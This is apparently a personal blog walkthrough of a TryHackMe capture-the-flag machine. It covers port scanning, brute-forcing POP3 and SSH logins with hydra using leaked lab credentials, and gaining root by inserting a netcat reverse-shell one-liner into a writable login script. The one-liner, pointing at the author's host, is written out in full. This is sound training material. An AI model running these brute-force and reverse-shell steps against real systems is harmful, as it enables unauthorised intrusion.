Fownsniff-CTF Walkthrough-Tryhackme
Hello every one hope you guys are doing great. This a write up of fownsniff CTF.
To access the challenge visit the challenge link provided.
As usual we connect to the challenge from tryhackme. And start solving.
Target IP: 10.10.108.117
Host IP: 10.9.178.153
Nmap scan:
Scan for open ports.
command : nmap -sS -sC -sV 10.10.108.117 -oA nmap
Port 22,80,110,143 are open.
We have port 80 open, so we will proceed for directory canning and checking it in the browser.
On the website there as a information regarding passwords leak. So on searching for @fownsniffcorp twitter account, we found a link to paste bin site where we found a bunch of credentials.
command used : gobuster dir -u http://10.10.108.117 -w /usr/share/wordlists/rockyou.txt -t 60
All the passwords are hashed so I used the hash cracker website to crack all the hashes.
I created two files one with all the user names (user.txt) and other with cracked password (pass.txt).
I used hydra to check valid credentials. First I checked for shh where I could not get any results. So, I used hydra on pop3 to find valid credentials.
Command : hydra -L user.txt -P pass.txt 10.10.108.117 pop3
And we found one.
Credentials are seina:scoobydoo2
Using the found credentials I was able to successfully log into the POP3 mailing.
command : telnet 10.10.108.117 110
There was a mail 1622 octets which gave a password for ssh login.
No adding this password to our previously created pass.txt file and by using hydra on ssh we found credentials for login.
Command : hydra -L user.txt -P pass.txt 10.10.108.117 ssh
Credentials are baskeen:Sick3nBluff+secureshell
We were able to successfully login into the ssh using baskteen credentials.
command : ssh baskteen@10.10.108.117
Now our goal is to elevate privilege. I tried to download automation scripts for enumerating but something was blocking. So I decided to manually enumerate. When I checked for user groups I found an file cube.sh as writable by the current user.
command: find / -group users -type f 2>/dev/null
I immediately added nc revershell into cube.sh which I grabbed it form the pentestmonkey. Changes I made to the script was I added host ip:10.9.178.153 and lport 1234.
revshell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.178.153 1234 >/tmp/f
I started net cat listener and executed the file cube.sh hoping to get root shell but I was getting the reverse shell of baskteen shell.
I further investigated further and found a file 00-header which used to execute the file cube.sh as root on starting the machine.
So, I exited from the current shell and and started a nc listener and again I logged into baskteen.
As expected we got the root shell. On enumerating we got the flag.txt file.
This challenge was easy to medium difficulty level machine which I enjoyed it solving.
Thank you everyone. I will be back with another challenge writeup.
